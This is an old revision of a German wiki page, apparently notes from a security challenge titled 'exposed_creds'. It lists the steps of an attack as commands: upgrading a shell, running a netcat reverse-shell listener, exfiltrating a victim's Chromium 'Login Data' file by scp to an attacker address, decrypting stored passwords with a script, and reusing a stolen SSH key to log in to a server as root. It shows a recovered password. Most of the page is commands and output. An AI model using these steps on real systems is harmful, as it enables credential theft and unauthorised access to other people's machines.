security:challenge:exposed_creds
Dies ist eine alte Version des Dokuments!
Inhaltsverzeichnis
Preparation
python3 -c 'import pty; pty.spawn("/bin/bash")'
Start Reverse Shell Listener
root@kali$ nc -l 8000
Enhance Shell
garry@desktop$
Ctrl-Z
echo $TERM
stty -a
stty raw -echo
fg
reset
export SHELL=bash
export TERM=xterm256-color
stty rows 38 columns 116
Enable ssh and exfiltrate
garry@desktop$ ssh-keygen -->copy/paste id_rsa.pub -> root@kali scp .config/chromium/Default/Login\ Data root@10.5.4.3:/tmp
Get Chrome Password
root@kali$
apt-get install python3-pip
sudo pip install pycrypto
apt-get install sqlite3
cd /tmp
#sqlite3 Login\ Data 'select username_value, password_value from logins;'
./get_chrome_pass.py
Decrypting the string: b'v10\xa1$z\xb0\x18\xee+\xbbMG\xe0\x0bM\x13\x7fA'
blokeontherange
Get Bobs Password
ssh 192.168.6.105
ssh into server
garry@desktop$ ssh -i .ssh/id_rsa root@server
security/challenge/exposed_creds.1624680019.txt.gz · Zuletzt geändert: von wikiadm